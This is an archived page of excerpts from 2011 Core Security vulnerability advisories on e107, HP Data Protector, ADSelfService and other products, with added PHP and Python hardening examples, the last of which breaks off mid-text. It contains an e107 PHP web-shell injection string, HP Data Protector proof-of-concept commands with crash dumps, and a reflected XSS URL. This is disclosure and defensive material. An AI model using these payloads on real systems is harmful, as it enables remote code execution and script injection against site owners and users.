[2] Upgrade Adobe Shockwave Player
http://get.adobe.com/shockwave/


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



[Full-disclosure] CORE-2011-0810 - E107 CMS Script Command Injection

2011-10-24 Thread Core Security Technologies Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/


e107 CMS Script Command Injection


1. *Advisory Information*

Title: e107 CMS Script Command Injection
Advisory ID: CORE-2011-0810
Advisory URL:
http://www.coresecurity.com/content/e107-cms-script-command-injection
Date published: 2011-10-24
Date of last update: 2011-10-24
Vendors contacted: e107
Release mode: Coordinated release

2. *Vulnerability Information*

Class: OS command injection [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1513

3. *Vulnerability Description*

When the install script for e107 CMS has not been removed, an attacker
can reinstall the application using arbitrary parameters. If the
attacker supplies a valid MySQL server address followed by a semicolon
and PHP code, that code is executed whenever the config file is
requested, because the install parameters are written verbatim into the
config file e107_config.php.

4. *Vulnerable packages*

. e107 0.7.24
. Older versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

The e107 team has issued a patch for this issue in revision 12375 [1] of
its SVN repository. The development version of e107 was also patched, in
revision 12376 [2].


6. *Credits*

This vulnerability was discovered and researched by Matt Bergin and
Matias Blanco.
The publication of this advisory was coordinated by Fernando Russ.

7. *Technical Description / Proof of Concept Code*

A possible value for the MySQL server parameter could be:

/-
localhost:63306';system($_GET['cmd']);$a='1
-/

Then, when the e107_config.php page is requested as
http://www.example.com/e107_config.php?cmd=id, the command id is
executed.
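Why the value above becomes code, and how a generated config file should be written instead, as an added PHP example (not e107 project code; the function names, the `$mySQLserver` variable name and the host[:port] validation rule are this example's own assumptions):

```php
<?php
// Added example, not e107 code: why the install parameter becomes code,
// and how a generated PHP config file should be written instead.
// Function names, the $mySQLserver variable name and the host[:port]
// rule are this example's own assumptions.

// Constructed sample input: the MySQL server value the advisory shows.
$untrusted = "localhost:63306';system(\$_GET['cmd']);\$a='1";

// Vulnerable pattern: the submitted value is pasted verbatim into PHP
// source. The single quote inside it closes the literal, so everything
// after it is parsed as further statements when the file is included.
function build_config_unsafe(string $server): string
{
    return "<?php\n\$mySQLserver = '" . $server . "';\n";
}

// Hardened pattern: reject anything that is not host[:port], then emit the
// value with var_export(), which returns a quoted PHP literal with quotes
// and backslashes escaped. The output can only ever be one assignment.
function build_config_safe(string $server): string
{
    if (!preg_match('/^[A-Za-z0-9.\-]{1,253}(:[0-9]{1,5})?$/', $server)) {
        throw new InvalidArgumentException('MySQL server must be host[:port]');
    }
    return "<?php\n\$mySQLserver = " . var_export($server, true) . ";\n";
}

// Defender-side check for an existing e107_config.php: a generated config
// should contain only assignments. Any identifier directly followed by an
// opening parenthesis is a function call and means the file was tampered
// with. token_get_all() is used so that string contents and comments are
// not mistaken for calls.
function config_has_call(string $source): bool
{
    $tokens = token_get_all($source);
    $n = count($tokens);
    for ($i = 0; $i < $n; $i++) {
        if (!is_array($tokens[$i]) || $tokens[$i][0] !== T_STRING) {
            continue;
        }
        // Skip whitespace between the identifier and the next token.
        $j = $i + 1;
        while ($j < $n && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
            $j++;
        }
        if ($j < $n && $tokens[$j] === '(') {
            return true;
        }
    }
    return false;
}

$bad = build_config_unsafe($untrusted);
echo $bad;
echo "unsafe config contains a call: ", config_has_call($bad) ? "yes" : "no", "\n";

try {
    build_config_safe($untrusted);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

$good = build_config_safe('localhost:3306');
echo $good;
echo "safe config contains a call: ", config_has_call($good) ? "yes" : "no", "\n";
```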
 

8. *Report Timeline*

. 2011-10-03:
Technical details sent to the vendor.

. 2011-10-03:
The e107 security team asks Core for a technical description of the
vulnerability.

. 2011-10-03:
Core sends the technical description of the vulnerability.

. 2011-10-21:
The e107 security team reports that the vulnerability was fixed and that
the fix is now live in the SVN for wider testing (changesets 12375 and
12376).

. 2011-10-21:
Core provides the CVE for this vulnerability.

. 2011-10-24:
Advisory CORE-2011-0810 is published.

9. *References*

[1] SVN reference to the patch for this issue in e107 (v0.7)
http://e107.svn.sourceforge.net/viewvc/e107?view=revision&revision=12375

[2] SVN reference to the patch for this issue in e107 (v0.8) (devel)
http://e107.svn.sourceforge.net/viewvc/e107?view=revision&revision=12376


12. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


[Full-disclosure] CORE-2011-0106: Microsoft Publisher 2007 Pubconv.dll Memory Corruption

2011-10-12 Thread CORE Security Technologies Advisories

13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



[Full-disclosure] CORE-2011-0506 - Multiples Vulnerabilities in ManageEngine ServiceDesk Plus

2011-09-14 Thread CORE Security Technologies Advisories

13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.





[Full-disclosure] CORE-2011-0526 - MS WINS ECommEndDlg Input Validation Error

2011-09-12 Thread CORE Security Technologies Advisories

12. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.





[Full-disclosure] CORE-2011-0514: Multiple vulnerabilities in HP Data Protector

2011-06-29 Thread CORE Security Technologies Advisories
8.6. *Vulnerability 6. Opcode 27.*

[CVE-2011-1865] This vulnerability is reproduced with the following command:
 poc.py 127.0.0.1 27 1 30 3
 A stack overflow is produced by calling the function swprintf from
position 0x0040AD53.


8.7. *Vulnerability 7. Opcode 17.*

[CVE-2011-1865] This vulnerability is reproduced with the following command:
 poc.py 127.0.0.1 17 1 30 6
 A stack overflow is produced by calling the function swprintf from
position 0x0040FC05.


8.8. *Vulnerability 8. Opcode 11.*

[CVE-2011-1514] This vulnerability is reproduced with the following command:
 poc.py 127.0.0.1 11 1 7 6
 This causes a null pointer dereference.

/-
eax=0014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490
edi=
eip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac
pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=
efl=00010212
omniinet+0x7ed0:
00407ed0 8b10 mov edx,[eax]
ds:0023:0014=


007cdd8c 0041143e   00156490 omniinet+0x7ed0
007cea3c 0040892b 0001 0046b9f0  omniinet+0x1143e
007cf4b8 00408f02   00156490 omniinet+0x892b
007cf518 0040a42c  7ad5f7f9  omniinet+0x8f02
007cffa0 77df352b 0001 00156498 0012e7f8 omniinet+0xa42c
007cffb4 7c80b713 00156490  0012e7f8
ADVAPI32!CryptVerifySignatureW+0x29
007cffec  77df3519 00156490 
kernel32!GetModuleFileNameA+0x1b4

-/


8.9. *Vulnerability 9. Opcode 20.*

[CVE-2011-1515] This vulnerability is reproduced with the following command:
 poc.py 127.0.0.1 20 1 7 6
 The process terminates without generating an exception, resulting in a
denial of service condition.


9. *Report Timeline*

. 2011-06-02:
Core Security Technologies notifies HP Security Alert team of the
vulnerabilities. Publication date is temporarily set to July 5th, 2011.

. 2011-06-06:
Vendor acknowledges receipt.

. 2011-06-06:
Core sends technical details to the vendor.

. 2011-06-06:
Vendor confirms that a new case was assigned within HP Software Security
Response Team (SSRT).

. 2011-06-16:
Core requests an update on this issue, in particular Core asks the
vendor for a technical analysis of the bugs, a list of affected products
and versions, and the vendor's plan for providing a fix (no reply
received).

. 2011-06-23:
Core requests once more an update.

. 2011-06-28:
Vendor communicates that a security bulletin will be issued on the same
day (June 28). The vendor confirms the vulnerabilities, and recommends
as mitigation to enable encrypted communications in the cell server and
client.

. 2011-06-28:
Core requests a link to the vendor's bulletin, and asks whether CVE ids
have been assigned.

. 2011-06-28:
Vendor provides a link to the bulletin and CVE names for the
vulnerabilities.

. 2011-06-29:
Advisory CORE-2011-0514 is published.


10. *References*

[1] HP Data Protector http://hp.com/go/dataprotector
[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,
Remote Execution of Arbitrary Code
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments

[Full-disclosure] CORE-2011-0606: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability

2011-06-29 Thread CORE Security Technologies Advisories
:[ECX]
0041D180 |. 85D2   TEST EDX,EDX
0041D182 |. 74 73  JE SHORT omniinet.0041D1F7
[...]
0041D1F7 | 8B45 0C/MOV EAX,DWORD PTR SS:[EBP+C]
0041D1FA |. 0FB708 |MOVZX ECX,WORD PTR DS:[EAX]
0041D1FD |. 85C9   |TEST ECX,ECX
0041D1FF |. 74 26  |JE SHORT omniinet.0041D227
0041D201 |. 8B55 08|MOV EDX,DWORD PTR SS:[EBP+8]
0041D204 |. 8955 FC|MOV DWORD PTR SS:[EBP-4],EDX
0041D207 |. 8B45 08|MOV EAX,DWORD PTR SS:[EBP+8]
0041D20A |. 8B4D 0C|MOV ECX,DWORD PTR SS:[EBP+C]
0041D20D |. 66:8B11|MOV DX,WORD PTR DS:[ECX]
0041D210 |. 66:8910|MOV WORD PTR DS:[EAX],DX // copy WORDs to the stack
0041D213 |. 8B45 08|MOV EAX,DWORD PTR SS:[EBP+8]
0041D216 |. 83C0 02|ADD EAX,2
0041D219 |. 8945 08|MOV DWORD PTR SS:[EBP+8],EAX
0041D21C |. 8B4D 0C|MOV ECX,DWORD PTR SS:[EBP+C]
0041D21F |. 83C1 02|ADD ECX,2
0041D222 |. 894D 0C|MOV DWORD PTR SS:[EBP+C],ECX
0041D225 |.^EB D0  \JMP SHORT omniinet.0041D1F7
0041D227 | 8B55 08MOV EDX,DWORD PTR SS:[EBP+8]
0041D22A |. 66:C702    MOV WORD PTR DS:[EDX],0
0041D22F |. 8B45 FCMOV EAX,DWORD PTR SS:[EBP-4]
0041D232 |. 8BE5   MOV ESP,EBP
0041D234 |. 5D POP EBP
0041D235 \. C3 RETN

-/



9. *Report Timeline*

. 2011-06-06:
Core Security Technologies notifies the HP team of the vulnerabilities
and provides the technical details. Publication date is temporarily set
to July 5th, 2011.

. 2011-06-06:
Vendor confirms that a new case was assigned within HP Software Security
Response Team (SSRT).

. 2011-06-16:
Core requests an update on this issue, in particular Core asks the
vendor for a technical analysis of the bugs, a list of affected products
and versions, and the vendor's plan for providing a fix (no reply
received).

. 2011-06-23:
Core requests once more an update.

. 2011-06-28:
Vendor communicates that a security bulletin will be issued on the same
day (June 28). The vendor confirms the vulnerabilities, and recommends
as mitigation to enable encrypted communications in the cell server and
client.

. 2011-06-28:
Core requests a link to the vendor's bulletin, and asks whether CVE ids
have been assigned.

. 2011-06-28:
Vendor provides a link to the bulletin and CVE names for the
vulnerabilities.

. 2011-06-29:
Advisory CORE-2011-0606 is published.



10. *References*

[1] HP Data Protector http://hp.com/go/dataprotector
[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,
Remote Execution of Arbitrary Code
http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

[Full-disclosure] CORE-2010-1021: IBM WebSphere Application Server Cross-Site Request Forgery

2011-06-15 Thread CORE Security Technologies Advisories
 about its own publication process [5].
Without additional information, it is difficult for Core to understand
the reason why users of vulnerable WebSphere software should remain
without any solution until Q3 2011.

. 2011-03-17:
After 1 month of silence, the vendor informs Core that IBM's point of
contact for this issue has changed, and that further communications will
be handled by the head of IBM's Secure By Design initiative which
includes the IBM PSIRT.

. 2011-03-17:
Vendor requests Core to postpone the publication of its advisory until
early October 2011.

. 2011-03-18:
Vendor communicates that since Core hasn't responded to the request
(sent the previous day) of deferring the public disclosure of this
security vulnerability from 21 March to early October 2011, IBM
considers that Core agrees.

. 2011-03-21:
Core answers that October 2011 is well beyond what it considers a
reasonable timeframe to patch the type of bug that it has reported (a
Cross-Site Request Forgery). Additionally the vendor didn't provide Core
a technical analysis of the bug, explaining the difficulty to patch it
(and why it would take IBM around 10 months to release fixes). The
vendor didn't provide either the requested list of affected products and
versions. According to Core's publication policy, the decision of
postponing the publication of an advisory cannot be taken without
technical arguments that justify that decision. This is why Core cannot
agree with IBM's request to postpone publication until October 2011,
unless the requested technical information is provided by the vendor.
(No reply received.)

. 2011-04-25:
Core communicates the vendor that it has rescheduled the publication of
its advisory to June 14th, 2011. That date corresponds to a 6 month
timeframe after technical details about this vulnerability were sent to
IBM (on December 14th, 2010), and is considered final. (No reply received.)

. 2011-06-15:
The advisory CORE-2010-1021 is published.


10. *References*

[1] IBM WebSphere Application Server:
http://www-01.ibm.com/software/webservers/appserv/was/

[2] Cross-Site Request Forgery (CSRF)
http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29

[3] Application Boundaries Enforcer (ABE)
http://noscript.net/abe/

[4] The author participated in Core Security's Bugweek 2010 as member of
the team Ex Tester fuErTes and Exploit Testers.

[5] Finding bugs and publishing advisories - the Core Security way
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Finding_bugs_and_publishing_advisories

[6] IBM WebSphere Reference, Global Security settings:
http://publib.boulder.ibm.com/infocenter/wasinfo/fep/topic/com.ibm.websphere.nd.multiplatform.doc/info/ae/ae/usec_secureadminappinfra.html


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAk35HjUACgkQyNibggitWa167gCfXeOi6AS7D37B3KCKs6Jcj1s+
zvIAn0siKkTeoI98lg6ng54dX78N4Vwd
=rWih
-END PGP SIGNATURE-


[Full-disclosure] CORE-2011-0203 - MS HyperV Persistent DoS Vulnerability

2011-06-14 Thread CORE Security Technologies Advisories
 and shared software tools for public use at:
http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and prove real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

[Full-disclosure] CORE-2010-0908: Lotus Notes XLS viewer malformed BIFF record heap overflow

2011-05-24 Thread CORE Security Technologies Advisories
 of Core's advisory is rescheduled for May
23rd, 2011.

. 2011-04-28:
Vendor replies that it will provide an update by the end of the week.

. 2011-05-04:
Vendor requests targeting May 24th for the publication of this
vulnerability.

. 2011-05-04:
Core agrees to reschedule for May 24th, requests a list of vulnerable
versions, and offers to include a vendor statement in its advisory.

. 2011-05-19:
Vendor replies that it is preparing an advisory which will outline the
fixes and options available. Vendor states that this vulnerability would
impact all current releases. Vendor asks whether a CVE has been assigned
to the vulnerability.

. 2011-05-20:
Core provides the CVE name assigned to the issue, and requests
additional information to be included in its advisory.

. 2011-05-24:
Vendor provides a link to its security alert, which includes information
about fixes and workarounds.

. 2011-05-24:
The advisory CORE-2010-0908 is published.



11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAk3cILkACgkQyNibggitWa1JXACfZhYfedrWImwvET8EoDXLaXT3
4UQAn1GqSKPazSFLZ15cWDD+JdkgtLif
=P9PQ
-END PGP SIGNATURE-



[Full-disclosure] CORE-2011-0204: Adobe Audition vulnerability processing malformed session file

2011-05-12 Thread CORE Security Technologies Advisories
 and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAk3MJSwACgkQyNibggitWa0eXQCdHKHspwXyJu8ZwHyf2sFlOrfg
6YwAn0Pf2/bZJ80H2C2IfO0fG9BpvP4d
=EybH
-END PGP SIGNATURE-



[Full-disclosure] CORE-2010-1118: Oracle GlassFish Server Administration Console Authentication Bypass

2011-05-11 Thread CORE Security Technologies Advisories
 be
easily applied by every customer.
   . Fixes have been integrated; all the final patches should be
available in July.

. 2011-05-05:
Core decides to release the advisory next Wednesday, May 11th; and
notifies the sequence of events that has motivated that decision:

   . Oracle was notified of the vulnerability 5 months ago.
   . Oracle released a fixed version of GlassFish (March 2011) without
notifying Core, without patching previous versions and without
publishing any workaround for affected users.
   . Core has a workaround that mitigates the vulnerability.

 Core sends the proposed workaround [Sec. 6.1] to the Oracle Team and
asks if they want to add further information in the advisory.

. 2011-05-06:
Oracle requests Core to hold the advisory publication until they have
patches available for all customers. Oracle states that they announce
security fixes on a pre-determined schedule, so users are prepared to
apply them. Ad hoc publication of issues may not allow every customer to
monitor and apply patches in time, which increases their exposure.

. 2011-05-09:
Core notifies that the publication of security advisories is aimed at
explaining the problem to the vulnerable user community and providing
the technical details and guidance so they can devise protection
countermeasures. Core usually releases this information in coordination
with the vendor, but in this case this is not possible because Oracle
has already released patches for some versions (without notifying Core).
Currently, there is a patched version of GlassFish and there are
vulnerable versions with exposed users. In this scenario, Core has
decided to release the advisory as a 'user release' next Wednesday,
providing a way to mitigate the problem until patches are available. The
vendor (Oracle in this case) may or may not agree with Core assessment
on how to help users to reduce risk, but the vendor is certainly not the
only party entitled to provide plausible solutions to the problem.

. 2011-05-11:
Advisory CORE-2010-1118 is published.



11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and prove real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAk3LEs0ACgkQyNibggitWa0xHwCfbxae3OXevZBQsTIVTvCk8A24
NJcAniSAW+b9R/XylVhdNeqszjj7v0p/
=LfGA
-END PGP SIGNATURE-



[Full-disclosure] CORE-2011-0208: VLC Vulnerabilities handling .AMV and .NSV files

2011-03-23 Thread CORE Security Technologies Advisories
/by-nc-sa/3.0/us


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAk2KWWUACgkQyNibggitWa1ilwCgmcHE6sjoDBlD6iaSlYBAJiXA
wnEAnjC85SPOZ1+ugKtVCGl7bxswqek9
=oV7u
-END PGP SIGNATURE-



[Full-disclosure] CORE-2011-0103 - ZOHO ManageEngine ADSelfService multiple vulnerabilities

2011-02-10 Thread CORE Security Technologies Advisories
-/
 The example above was caused by following a link to:

/-
http://SERVER/EmployeeSearch.cc?actionId=Search&parameterName=name&searchType=contains&searchString=alice%22+onMouseOver%3D%22javascript%3Aalert%28%27xss%27%29
-/
 This reflection is not obvious at first sight, as the source code shown
after the process is finished is the showList page source. This code can
be easily viewed if captured on the wire using a proxy server, though.

Additionally, since invoking
'http://SERVER/EmployeeSearch.cc?actionId=Search' causes a redirection
to 'http://SERVER/EmployeeSearch.cc?actionId=showList', entering any
data capable of triggering a vulnerability in the latter page can be
introduced in the former with the same results.

It is important to note that since the cross site scripting
vulnerabilities were detected while investigating the authentication
bypass issues and were considered a secondary matter, the pages
containing them were not thoroughly tested. This leaves the possibility
of other similar cross site scripting vulnerabilities remaining undetected.


9. *Report Timeline*

. 2011-01-11:
Initial notification to the vendor. Publication date set to February
2nd, 2011.

. 2011-01-13:
The Zoho team asks Core for a technical description of the vulnerability.

. 2011-01-13:
Technical details sent to Zoho team by Core.

. 2011-01-17:
The Zoho team acknowledges reception of the advisory draft and asks for
a contact phone number to discuss these flaws.

. 2011-01-17:
The Core team notifies its preference for keeping the whole
communication process through email, in order to track all interactions,
and involve all those interested in:

   1. the Core Security Advisories Team,
   2. the Zoho team and,
   3. the discoverer of the vulnerability.

 If there is something that cannot be resolved via email, Core team can
eventually send a phone number to set up a conference call, but that is
not necessary at the moment.

. 2011-01-20:
The Zoho team notifies that the vulnerabilities highlighted in the
document will be addressed in the upcoming release of ADSelfService
Plus, scheduled to be released before Feb. 11th.

. 2011-01-21:
Core notifies that the advisory was re-scheduled to Feb. 10th, and asks
if any security bulletin is going to be released by the Zoho team regarding
these vulnerabilities.

. 2011-01-28:
The Zoho team notifies that they are on schedule for the release of the
new version of ADSelfService Plus. Zoho have plans to publish a report
regarding these vulnerabilities, including solutions and workarounds.

. 2011-02-07:
Core asks if Zoho team will be ready for disclosure next Thursday Feb
10th in order to coordinate the advisory publication.

. 2011-02-08:
The Zoho team notifies that they are ready with the Engineering Release
version ADSelfService Plus 4.5 Build 4500. This version of ADSelfService
Plus has taken into consideration and also addressed all security
vulnerabilities highlighted by this advisory. Zoho is going to make a
public announcement by tomorrow.

. 2011-02-10:
The advisory CORE-2011-0103 is published.



11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com/.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and prove real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team
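The reflected cross-site scripting in the CORE-2011-0103 advisory above (section 8) is an attribute-context breakout: the double quote inside searchString closes the value attribute and the remainder of the parameter adds an onMouseOver handler. The following Python is an added example, not code from the advisory or from ADSelfService Plus. render_vulnerable and render_hardened are hypothetical stand-ins for the showList form, SERVER is the advisory's placeholder host, and the request line and the detection regex are constructed for illustration. It shows the breakout as a browser-style parser sees it, the attribute-encoded form that closes it, and a query-string check a defender can run over access logs; since the advisory notes that actionId=Search redirects to actionId=showList, the check inspects every parameter regardless of actionId.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed request modelled on the advisory's link; "SERVER" is a placeholder host.
SAMPLE_URL = ("http://SERVER/EmployeeSearch.cc?actionId=Search&parameterName=name"
              "&searchType=contains"
              "&searchString=alice%22+onMouseOver%3D%22javascript%3Aalert%28%27xss%27%29")


def search_string_from(url: str) -> str:
    """Decode the searchString parameter the way the server-side handler sees it."""
    params = parse_qs(urlsplit(url).query)
    return params.get("searchString", [""])[0]


def render_vulnerable(search_string: str) -> str:
    """Hypothetical showList form that echoes the raw parameter into a value attribute."""
    return '<input type="text" name="searchString" value="%s">' % search_string


def render_hardened(search_string: str) -> str:
    """Same form with HTML attribute encoding: the double quote becomes &quot;, so the
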